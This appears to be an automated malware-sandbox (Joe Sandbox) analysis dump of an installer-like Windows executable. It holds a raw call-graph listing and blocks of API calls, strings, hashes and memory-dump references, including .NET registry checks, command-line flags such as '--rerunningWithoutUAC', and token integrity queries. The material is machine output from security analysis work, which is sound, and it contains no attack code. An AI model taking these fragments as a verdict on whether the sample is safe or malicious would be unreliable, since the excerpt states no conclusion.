___std_exception_copy 3 API calls 12767->12768 12768->12767 12769 22a667 12768->12769 12772 22a669 12768->12772 12776 231200 12768->12776 12769->12743 12771 22ac53 12773 22c3d9 __CxxThrowException@8 RaiseException 12771->12773 12772->12771 12774 22c3d9 __CxxThrowException@8 RaiseException 12772->12774 12775 22ac70 12773->12775 12774->12771 12775->12743 12779 23122d 12776->12779 12778 23120b 12778->12768 12780 231239 ___DestructExceptionObject 12779->12780 12785 2351f0 EnterCriticalSection 12780->12785 12782 231244 12786 231276 12782->12786 12784 23126b _unexpected 12784->12778 12785->12782 12789 235238 LeaveCriticalSection 12786->12789 12788 23127d 12788->12784 12789->12788 12791 22e01e pre_c_initialization 11 API calls 12790->12791 12792 22e08e 12791->12792 12792->12749 12794 22220e 12793->12794 12795 2221fa 12793->12795 12794->12748 12795->12794 12805 2221d4 12795->12805 12797 22222a 12799 22223d 12797->12799 12801 22224c 12797->12801 12803 22224e ___scrt_fastfail 12797->12803 12798 2221f0 12 API calls 12800 2222a1 12798->12800 12802 22e082 pre_c_initialization 11 API calls 12799->12802 12800->12748 12801->12798 12802->12801 12803->12801 12804 22e082 pre_c_initialization 11 API calls 12803->12804 12804->12801 12806 2221e2 12805->12806 12807 22c3d9 __CxxThrowException@8 RaiseException 12806->12807 12809 2221ef 12807->12809 12808 22220e 12808->12797 12809->12808 12810 2221d4 12 API calls 12809->12810 12811 22222a 12810->12811 12813 22223d 12811->12813 12815 22224c 12811->12815 12817 22224e ___scrt_fastfail 12811->12817 12812 2221f0 12 API calls 12814 2222a1 12812->12814 12816 22e082 pre_c_initialization 11 API calls 12813->12816 12814->12797 12815->12812 12816->12815 12817->12815 12818 22e082 pre_c_initialization 11 API calls 12817->12818 12818->12815 12820 221c00 12819->12820 12821 221bec GetLastError 12819->12821 12820->12503 12821->12820 12823 221e23 12822->12823 12824 221e35 RegOpenKeyExW 12822->12824 12835 221d9c 12823->12835 12826 221e47 12824->12826 12828 
221e54 12826->12828 12829 221e76 RegCloseKey 12826->12829 12830 22a3ad CatchGuardHandler 5 API calls 12828->12830 12829->12828 12831 221195 12830->12831 12831->12529 12831->12534 12833 2211e4 12832->12833 12834 221e7f RegCloseKey 12832->12834 12833->12532 12834->12833 12836 221da9 GetModuleHandleW 12835->12836 12837 221ddc 12835->12837 12839 221dc8 12836->12839 12840 221db8 GetProcAddress 12836->12840 12838 221de1 RegOpenKeyExW 12837->12838 12837->12839 12838->12839 12839->12826 12840->12839 12841->12537 12843 222666 lstrlenW 12842->12843 12850 222707 12842->12850 12844 222689 _wcsstr 12843->12844 12843->12850 12845 2226b5 lstrlenW 12844->12845 12845->12844 12846 2226c7 12845->12846 12847 221f8d 15 API calls 12846->12847 12846->12850 12848 2226d9 12847->12848 12849 222157 4 API calls 12848->12849 12856 222724 Mailbox _wcsstr 12848->12856 12851 222703 12849->12851 12850->12543 12851->12850 12852 22222b 12 API calls 12851->12852 12852->12856 12853 2227f0 lstrlenW 12853->12850 12853->12856 12855 22222b 12 API calls 12855->12856 12856->12850 12856->12853 12856->12855 12860 2225f0 12856->12860 12858 2223c3 GetLastError 12857->12858 12859 2223ce 12857->12859 12858->12859 12859->12545 12859->12549 12861 2225fb 12860->12861 12864 222610 12860->12864 12861->12864 12865 22e082 pre_c_initialization 11 API calls 12861->12865 12862 2221f0 12 API calls 12863 22263d 12862->12863 12863->12856 12864->12862 12865->12864 12867 221a53 LoadLibraryW 12866->12867 12868 221a4d 12866->12868 12869 221a69 GetProcAddress 12867->12869 12870 221a8c 12867->12870 12868->12867 12871 221a85 FreeLibrary 12869->12871 12872 221a79 12869->12872 12870->12554 12871->12870 12872->12871 12873->12565 12877 22e17c 12874->12877 12875 22e082 pre_c_initialization 11 API calls 12876 22e19e 12875->12876 12876->12572 12877->12875 12877->12876 12879 22e1e2 12878->12879 12880 22e082 pre_c_initialization 11 API calls 12879->12880 12881 22153a 12879->12881 12880->12881 12881->12565 12881->12582 12883 221b17 
__EH_prolog3_catch 12882->12883 12887 221b20 12883->12887 12900 22a5f8 12883->12900 12886 221bdc 2 API calls 12886->12887 12887->12587 12889 221787 12888->12889 12891 2217a6 ___scrt_fastfail 12888->12891 12903 221c52 12889->12903 12893 221a3f 3 API calls 12891->12893 12892 22a3ad CatchGuardHandler 5 API calls 12894 221845 12892->12894 12895 221816 12893->12895 12894->12565 12896 22179a 12895->12896 12907 221847 12895->12907 12896->12892 12901 22a648 4 API calls 12900->12901 12902 221b48 12901->12902 12902->12886 12902->12887 12904 221c67 ___scrt_initialize_default_local_stdio_options 12903->12904 12924 230a25 12904->12924 12908 221dff 10 API calls 12907->12908 12909 221889 12908->12909 12910 2218b8 12909->12910 12911 22188d GetModuleFileNameW 12909->12911 12912 221e76 RegCloseKey 12910->12912 12911->12910 12913 2218c9 12912->12913 12914 22a3ad CatchGuardHandler 5 API calls 12913->12914 12915 221824 12914->12915 12915->12896 12916 2218d8 12915->12916 12917 2218fd 12916->12917 12918 221901 GetCurrentProcess OpenProcessToken 12917->12918 12922 221956 12917->12922 12919 22191d 12918->12919 12918->12922 12919->12922 12923 22194d CloseHandle 12919->12923 12920 22a3ad CatchGuardHandler 5 API calls 12921 221963 12920->12921 12921->12896 12922->12920 12923->12922 12925 230a6a 12924->12925 12926 230a55 12924->12926 12925->12926 12927 230a6e 12925->12927 12929 22e082 pre_c_initialization 11 API calls 12926->12929 12931 22e248 12927->12931 12930 221c71 12929->12930 12930->12896 12932 22e254 ___DestructExceptionObject 12931->12932 12939 230c16 EnterCriticalSection 12932->12939 12934 22e262 12940 22ec58 12934->12940 12938 22e280 _unexpected 12938->12930 12939->12934 12956 2344c0 12940->12956 12944 22ec92 12973 22ef8a 12944->12973 12951 22a3ad CatchGuardHandler 5 API calls 12952 22e26f 12951->12952 12953 22e28d 12952->12953 13109 230c2a LeaveCriticalSection 12953->13109 12955 22e297 12955->12938 12988 23445b 12956->12988 12958 2344d1 12993 2399a7 12958->12993 12960 2344d7 12961 
22ec7b 12960->12961 12998 233674 12960->12998 12965 22eb97 12961->12965 12963 234532 13003 23363a 12963->13003 12966 22ebb7 12965->12966 12967 22ebae 12965->12967 12966->12967 13008 2331d2 GetLastError 12966->13008 12967->12944 12969 22ebd7 13030 233a0d 12969->13030 13067 230626 12973->13067 12975 22ecd6 12981 22ec1a 12975->12981 12976 22efaa 12977 22e082 pre_c_initialization 11 API calls 12976->12977 12977->12975 12978 22ef9b 12978->12975 12978->12976 13074 22f36c 12978->13074 13080 230662 12978->13080 12982 23363a _free 2 API calls 12981->12982 12983 22ec2a 12982->12983 12984 234573 12983->12984 12985 23457e 12984->12985 12986 22ed05 12984->12986 12985->12986 13094 234ed4 12985->13094 12986->12951 12989 234467 12988->12989 12990 23447c 12988->12990 12991 22e082 pre_c_initialization 11 API calls 12989->12991 12990->12958 12992 234477 12991->12992 12992->12958 12994 2399c1 12993->12994 12995 2399b4 12993->12995 12996 2399cd 12994->12996 12997 22e082 pre_c_initialization 11 API calls 12994->12997 12995->12960 12996->12960 12997->12995 12999 2336b0 12998->12999 13002 233682 _unexpected 12998->13002 12999->12963 13000 23369d HeapAlloc 13000->12999 13000->13002 13001 231200 _unexpected 2 API calls 13001->13002 13002->12999 13002->13000 13002->13001 13004 23366e __dosmaperr 13003->13004 13005 233645 HeapFree 13003->13005 13004->12961 13005->13004 13006 23365a 13005->13006 13007 233660 GetLastError 13006->13007 13007->13004 13010 2331e9 13008->13010 13028 2331f5 SetLastError 13010->13028 13038 234aec 13010->13038 13013 23321d 13015 233225 13013->13015 13016 23323c 13013->13016 13017 234aec _unexpected TlsSetValue 13015->13017 13019 234aec _unexpected TlsSetValue 13016->13019 13020 233233 13017->13020 13018 233283 13018->12969 13021 233248 13019->13021 13026 23363a _free 2 API calls 13020->13026 13022 23325d 13021->13022 13023 23324c 13021->13023 13047 232ffc 13022->13047 13024 234aec _unexpected TlsSetValue 13023->13024 13024->13020 13026->13028 13028->13018 13029 23363a 
_free 2 API calls 13029->13028 13031 233a20 13030->13031 13033 22ebed 13030->13033 13031->13033 13052 23729d 13031->13052 13034 233a3a 13033->13034 13035 233a4d 13034->13035 13037 233a62 13034->13037 13035->13037 13062 235d9c 13035->13062 13037->12967 13039 234b08 13038->13039 13040 23320d 13039->13040 13041 234b26 TlsSetValue 13039->13041 13040->13028 13042 23479b 13040->13042 13045 2347a8 _unexpected 13042->13045 13043 2347d3 RtlAllocateHeap 13044 2347e6 13043->13044 13043->13045 13044->13013 13045->13043 13045->13044 13046 231200 _unexpected EnterCriticalSection LeaveCriticalSection 13045->13046 13046->13045 13048 232eb8 _unexpected EnterCriticalSection LeaveCriticalSection 13047->13048 13049 23306a 13048->13049 13050 232fac _unexpected HeapFree GetLastError EnterCriticalSection LeaveCriticalSection 13049->13050 13051 233093 13050->13051 13051->13029 13053 2372a9 ___DestructExceptionObject 13052->13053 13054 2331d2 _unexpected 8 API calls 13053->13054 13055 2372b2 13054->13055 13056 2351f0 _unexpected EnterCriticalSection 13055->13056 13061 2372f4 _unexpected 13055->13061 13057 2372d0 13056->13057 13058 237314 __cftof HeapFree GetLastError 13057->13058 13059 2372e1 13058->13059 13060 2372fd __cftof LeaveCriticalSection 13059->13060 13060->13061 13061->13033 13063 2331d2 _unexpected 8 API calls 13062->13063 13064 235da6 13063->13064 13065 235cbe __cftof HeapFree GetLastError EnterCriticalSection LeaveCriticalSection 13064->13065 13066 235dac 13065->13066 13066->13037 13068 23063f 13067->13068 13069 23062c 13067->13069 13085 230684 13068->13085 13072 22e082 pre_c_initialization 11 API calls 13069->13072 13073 23063c 13072->13073 13073->12978 13091 22f3aa 13074->13091 13076 22f371 13077 22f388 13076->13077 13078 22e082 pre_c_initialization 11 API calls 13076->13078 13077->12978 13079 22f385 13078->13079 13079->12978 13081 230681 13080->13081 13082 230668 13080->13082 13081->12978 13082->13081 13083 22e082 pre_c_initialization 11 API calls 13082->13083 13084 23067e 
13083->13084 13084->12978 13086 230698 13085->13086 13090 230645 13085->13090 13087 23445b ___scrt_uninitialize_crt 11 API calls 13086->13087 13088 23069f 13087->13088 13089 22e082 pre_c_initialization 11 API calls 13088->13089 13088->13090 13089->13090 13090->12978 13092 22f401 11 API calls 13091->13092 13093 22f3ba 13092->13093 13093->13076 13095 234eec 13094->13095 13099 234f11 13094->13099 13096 23445b ___scrt_uninitialize_crt 11 API calls 13095->13096 13095->13099 13097 234f0a 13096->13097 13100 23a46a 13097->13100 13099->12986 13101 23a476 ___DestructExceptionObject 13100->13101 13102 23a4c8 13101->13102 13104 23a531 __dosmaperr 13101->13104 13106 23a47e __dosmaperr _unexpected 13101->13106 13103 236a75 ___scrt_uninitialize_crt EnterCriticalSection 13102->13103 13107 23a4ce __dosmaperr 13103->13107 13105 22e082 pre_c_initialization 11 API calls 13104->13105 13105->13106 13106->13099 13108 23a529 ___scrt_uninitialize_crt LeaveCriticalSection 13107->13108 13108->13106 13109->12955 13110->12594 13112 23153e 13111->13112 13113 23152c 13111->13113 13129 2313d9 13112->13129 13114 22af78 GetModuleHandleW 13113->13114 13116 231531 13114->13116 13116->13112 13123 2315c6 GetModuleHandleExW 13116->13123 13117 231571 13118 231577 13117->13118 13137 231584 13117->13137 13118->12383 13124 2315e5 GetProcAddress 13123->13124 13125 231608 13123->13125 13128 2315fa 13124->13128 13126 23153d 13125->13126 13127 23160e FreeLibrary 13125->13127 13126->13112 13127->13126 13128->13125 13130 2313e5 ___DestructExceptionObject 13129->13130 13145 2351f0 EnterCriticalSection 13130->13145 13132 2313ef 13146 23143b 13132->13146 13134 2313fc 13150 231410 13134->13150 13136 231408 _unexpected 13136->13117 13174 2352eb GetPEB 13137->13174 13139 23158e 13140 2315b3 13139->13140 13141 231593 GetPEB 13139->13141 13143 2315c6 3 API calls 13140->13143 13141->13140 13142 2315a3 GetCurrentProcess TerminateProcess 13141->13142 13142->13140 13144 2315bb ExitProcess 13143->13144 13145->13132 13147 
231447 ___DestructExceptionObject 13146->13147 13148 2314a8 _unexpected 13147->13148 13153 231f50 13147->13153 13148->13134 13173 235238 LeaveCriticalSection 13150->13173 13152 23141a 13152->13136 13156 231c91 13153->13156 13155 231f7b 13155->13148 13157 231c9d ___DestructExceptionObject 13156->13157 13164 2351f0 EnterCriticalSection 13157->13164 13159 231cab 13165 231e5e 13159->13165 13163 231cc9 _unexpected 13163->13155 13164->13159 13166 231e7d 13165->13166 13167 231cb8 13165->13167 13166->13167 13168 23363a _free 2 API calls 13166->13168 13169 231cd6 13167->13169 13168->13167 13172 235238 LeaveCriticalSection 13169->13172 13171 231ce0 13171->13163 13172->13171 13173->13152 13175 235305 13174->13175 13175->13139 13177 2320f7 13176->13177 13179 232109 ___scrt_uninitialize_crt 13176->13179 13178 232105 13177->13178 13189 234f81 13177->13189 13178->12445 13179->12445 13182 22c19c 13181->13182 13188 22c1ad 13181->13188 13258 22c571 13182->13258 13188->12443 13192 234e2d 13189->13192 13195 234d8b 13192->13195 13194 234e6c 13194->13178 13196 234d97 ___DestructExceptionObject 13195->13196 13203 2351f0 EnterCriticalSection 13196->13203 13198 234da1 ___scrt_uninitialize_crt 13199 234e0d 13198->13199 13204 234d09 13198->13204 13212 234e21 13199->13212 13201 234e19 _unexpected 13201->13194 13203->13198 13205 234d15 ___DestructExceptionObject 13204->13205 13215 230c16 EnterCriticalSection 13205->13215 13207 234d1f ___scrt_uninitialize_crt 13211 234d58 13207->13211 13216 234f39 13207->13216 13210 234d77 _unexpected 13210->13198 13226 234d7f 13211->13226 13257 235238 LeaveCriticalSection 13212->13257 13214 234e2b 13214->13201 13215->13207 13217 234f46 13216->13217 13218 234f4f 13216->13218 13219 234e2d ___scrt_uninitialize_crt 19 API calls 13217->13219 13220 234ed4 ___scrt_uninitialize_crt 13 API calls 13218->13220 13221 234f4c 13219->13221 13222 234f55 13220->13222 13221->13211 13222->13221 13223 23445b ___scrt_uninitialize_crt 11 API calls 13222->13223 13224 234f6b 
13223->13224 13229 239c66 13224->13229 13256 230c2a LeaveCriticalSection 13226->13256 13228 234d89 13228->13210 13230 239c77 13229->13230 13231 239c84 13229->13231 13230->13221 13232 239ccd 13231->13232 13233 239cab 13231->13233 13235 22e082 pre_c_initialization 11 API calls 13232->13235 13236 239bce 13233->13236 13235->13230 13237 239bda ___DestructExceptionObject 13236->13237 13247 236a75 EnterCriticalSection 13237->13247 13239 239be9 13243 239c30 13239->13243 13248 236b4c 13239->13248 13241 239c15 FlushFileBuffers 13242 239c21 __dosmaperr 13241->13242 13241->13243 13245 239c26 GetLastError 13242->13245 13253 239c5a 13243->13253 13245->13243 13246 239c4d _unexpected 13246->13230 13247->13239 13249 236b6e __dosmaperr 13248->13249 13250 236b59 __dosmaperr 13248->13250 13251 236b93 13249->13251 13252 22e082 pre_c_initialization 11 API calls 13249->13252 13250->13241 13251->13241 13252->13250 13254 236a98 ___scrt_uninitialize_crt LeaveCriticalSection 13253->13254 13255 239c64 13254->13255 13255->13246 13256->13228 13257->13214 13259 22c57b 13258->13259 13260 22c1a1 13258->13260 13270 22d502 13259->13270 13262 22d365 13260->13262 13263 22c1a6 13262->13263 13264 22d370 13262->13264 13266 22d626 13263->13266 13265 22d37a DeleteCriticalSection 13264->13265 13265->13263 13265->13265 13267 22d655 13266->13267 13268 22d62f 13266->13268 13267->13188 13268->13267 13269 22d63f FreeLibrary 13268->13269 13269->13268 13275 22d458 13270->13275 13272 22d51c 13273 22d534 TlsFree 13272->13273 13274 22d528 13272->13274 13273->13274 13274->13260 13276 22d480 13275->13276 13280 22d47c __crt_fast_encode_pointer 13275->13280 13276->13280 13281 22d394 13276->13281 13279 22d49a GetProcAddress 13279->13280 13280->13272 13286 22d3a3 13281->13286 13282 22d44d 13282->13279 13282->13280 13283 22d3c0 LoadLibraryExW 13284 22d3db GetLastError 13283->13284 13283->13286 13284->13286 13285 22d436 FreeLibrary 13285->13286 13286->13282 13286->13283 13286->13285 13287 22d40e LoadLibraryExW 13286->13287 
13287->13286 13910 233097 13911 2330a2 13910->13911 13915 2330b2 13910->13915 13916 2330b8 13911->13916 13914 23363a _free 2 API calls 13914->13915 13917 2330d3 13916->13917 13918 2330cd 13916->13918 13920 23363a _free 2 API calls 13917->13920 13919 23363a _free 2 API calls 13918->13919 13919->13917 13921 2330df 13920->13921 13922 23363a _free 2 API calls 13921->13922 13923 2330ea 13922->13923 13924 23363a _free 2 API calls 13923->13924 13925 2330f5 13924->13925 13926 23363a _free 2 API calls 13925->13926 13927 233100 13926->13927 13928 23363a _free 2 API calls 13927->13928 13929 23310b 13928->13929 13930 23363a _free 2 API calls 13929->13930 13931 233116 13930->13931 13932 23363a _free 2 API calls 13931->13932 13933 233121 13932->13933 13934 23363a _free 2 API calls 13933->13934 13935 23312c 13934->13935 13936 23363a _free 2 API calls 13935->13936 13937 23313a 13936->13937 13942 232f00 13937->13942 13939 233160 13950 232f61 13939->13950 13941 2330aa 13941->13914 13943 232f0c ___DestructExceptionObject 13942->13943 13958 2351f0 EnterCriticalSection 13943->13958 13945 232f40 13959 232f55 13945->13959 13946 232f16 13946->13945 13949 23363a _free 2 API calls 13946->13949 13948 232f4d _unexpected 13948->13939 13949->13945 13951 232f6d ___DestructExceptionObject 13950->13951 13963 2351f0 EnterCriticalSection 13951->13963 13953 232f77 13964 233187 13953->13964 13955 232f8a 13968 232fa0 13955->13968 13957 232f98 _unexpected 13957->13941 13958->13946 13962 235238 LeaveCriticalSection 13959->13962 13961 232f5f 13961->13948 13962->13961 13963->13953 13965 233196 _unexpected 13964->13965 13967 2331bd _unexpected 13964->13967 13965->13967 13971 23704f 13965->13971 13967->13955 14085 235238 LeaveCriticalSection 13968->14085 13970 232faa 13970->13957 13976 237065 13971->13976 13993 2370cf 13971->13993 13973 23363a _free 2 API calls 13975 2370f1 13973->13975 13974 237098 13977 2370ba 13974->13977 13984 23363a _free 2 API calls 13974->13984 13978 23363a _free 2 API calls 

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetDefaultDllDirectories.KERNEL32(00000800), ref: 0022734F
                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0022735A
                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00227366
                                                                    • CoInitialize.OLE32(00000000), ref: 002273CD
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002273EE
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00222373
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000), ref: 00222377
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000), ref: 0022237B
                                                                      • Part of subcall function 00222304: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0022239E
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,--rerunningWithoutUAC,?,00246FB0), ref: 00227506
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00001000), ref: 00227519
                                                                    Strings
                                                                    • Failed to install the .NET Framework, try installing the latest version manually, xrefs: 002274D3
                                                                    • kernel32.dll, xrefs: 00227355
                                                                    • --checkInstall, xrefs: 0022738C
                                                                    • This program cannot run on Windows XP or before; it requires a later version of Windows., xrefs: 002274A2
                                                                    • --rerunningWithoutUAC, xrefs: 00227445
                                                                    • Incompatible Operating System, xrefs: 0022749D
                                                                    • --silent, xrefs: 002273BF
                                                                    • SetDefaultDllDirectories, xrefs: 00227360
                                                                    • Please re-run this installer as a normal user instead of "Run as Administrator"., xrefs: 00227463
                                                                    • --rerunningWithoutUAC, xrefs: 00227536
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$Module$AddressCommonControlsDefaultDirectoriesFileHandleInfoInitInitializeLibraryLoadNameProcVerifyVersion
                                                                    • String ID: --rerunningWithoutUAC$ --silent$--checkInstall$--rerunningWithoutUAC$Failed to install the .NET Framework, try installing the latest version manually$Incompatible Operating System$Please re-run this installer as a normal user instead of "Run as Administrator".$SetDefaultDllDirectories$This program cannot run on Windows XP or before; it requires a later version of Windows.$kernel32.dll
                                                                    • API String ID: 365319271-1442077338
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,00231583,?,?,?,?), ref: 002315A6
                                                                    • TerminateProcess.KERNEL32(00000000,?,00231583,?,?,?,?), ref: 002315AD
                                                                    • ExitProcess.KERNEL32 ref: 002315BF
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002271F9
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0022720A
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272CF
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272E6
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272FD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectoryH_prolog3_System
                                                                    • String ID: \logoncli.dll$\sspicli.dll$\version.dll
                                                                    • API String ID: 204495113-3953914256
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00226361
                                                                    • VariantInit.OLEAUT32(?), ref: 0022639E
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EC8,?), ref: 002263F1
                                                                    • IUnknown_Release_Proxy.RPCRT4(?), ref: 0022647E
                                                                    • VariantClear.OLEAUT32(?), ref: 0022649C
                                                                    • VariantClear.OLEAUT32(?), ref: 002264A2
                                                                    Similarity
                                                                    • API ID: Variant$ClearProxyUnknown_$H_prolog3_InitInterface_QueryRelease_
                                                                    • String ID:
                                                                    • API String ID: 350923872-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246ED8,?), ref: 00226617
                                                                    • SysFreeString.OLEAUT32(?), ref: 0022667D
                                                                    • VariantClear.OLEAUT32(?), ref: 002266A1
                                                                    • VariantClear.OLEAUT32(?), ref: 002266AA
                                                                    • VariantClear.OLEAUT32(?), ref: 002266B3
                                                                    • VariantClear.OLEAUT32(?), ref: 002266B9
                                                                    Similarity
                                                                    • API ID: ClearVariant$FreeInterface_ProxyQueryStringUnknown_
                                                                    • String ID:
                                                                    • API String ID: 3803624483-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 002262E9
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 002262FA
                                                                    • GetLastError.KERNEL32 ref: 00226304
                                                                    • GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00226329
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00226345
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                    • String ID:
                                                                    • API String ID: 2078281146-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0022AAAC
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 0022AAEF
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ___scrt_is_nonwritable_in_current_image___scrt_uninitialize_crt
                                                                    • String ID: PWh$Mk
                                                                    • API String ID: 2554503057-1383596220
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 180 22115f-221197 call 221dff 183 221199-2211c0 RegQueryValueExW 180->183 184 2211dc-2211f3 call 221e76 call 22a3ad 180->184 183->184 186 2211c2-2211c6 183->186 186->184 187 2211c8-2211cc 186->187 187->184 189 2211ce-2211d8 call 2211f4 187->189 189->184 194 2211da 189->194 194->184
                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(?,Release,00000000,?,?,?,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 002211B8
                                                                    Strings
                                                                    • Release, xrefs: 002211B0
                                                                    • SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full, xrefs: 0022117A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID: Release$SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
                                                                    • API String ID: 3660427363-1765340461
                                                                    • Opcode ID: 93f55fa42e33af7206cfb72b1750cda27c6ae511e60ec877e6fbef91419db110
                                                                    • Instruction ID: 3477fdcfb420336f010391861e5695e954e91c58081f1fb3dd5ee633f53fab66
                                                                    • Opcode Fuzzy Hash: 93f55fa42e33af7206cfb72b1750cda27c6ae511e60ec877e6fbef91419db110
                                                                    • Instruction Fuzzy Hash: 52113C74E1032EAFDB04DFD5EC81EEEB7B8EB15744F00446EE905A2241EA709A35CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 203 2264bd-2264df call 23d66e call 22635a 208 226521-22652a 203->208 209 2264e1-2264ff 203->209 210 226532-226539 call 23d618 208->210 211 22652c-22652e 208->211 215 226511-226519 209->215 216 226501-22650f IUnknown_QueryInterface_Proxy 209->216 211->210 215->208 217 22651b-22651d 215->217 216->215 217->208
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002264C4
                                                                      • Part of subcall function 0022635A: __EH_prolog3_GS.LIBCMT ref: 00226361
                                                                      • Part of subcall function 0022635A: VariantInit.OLEAUT32(?), ref: 0022639E
                                                                      • Part of subcall function 0022635A: IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EC8,?), ref: 002263F1
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EE8), ref: 0022650D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_Interface_ProxyQueryUnknown_$InitVariant
                                                                    • String ID:
                                                                    • API String ID: 2261498493-0
                                                                    • Opcode ID: d25c33c8374788fcd8059455f1ae10df633e62f5f84f9452495a6d43dc98cf09
                                                                    • Instruction ID: f0ed408905b9590c6db6b104e8d0e5d5445de93e6180fd33bf897dd1a10dc2ad
                                                                    • Opcode Fuzzy Hash: d25c33c8374788fcd8059455f1ae10df633e62f5f84f9452495a6d43dc98cf09
                                                                    • Instruction Fuzzy Hash: 3711A172E11216AFCB14DFE8D4899AFBBB4AF45710F544298E905EB240CB30DE11CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 218 23692f-23693c call 23479b 220 236941-23694c 218->220 221 236952-23695a 220->221 222 23694e-236950 220->222 223 23699d-2369ab call 23363a 221->223 224 23695c-236960 221->224 222->223 225 236962-236997 call 234b2e 224->225 230 236999-23699c 225->230 230->223
                                                                    APIs
                                                                      • Part of subcall function 0023479B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00233374,00000001,00000364,00000006,000000FF,?,002311CD,?,00000004,00000000,?,?), ref: 002347DC
                                                                    • _free.LIBCMT ref: 0023699E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
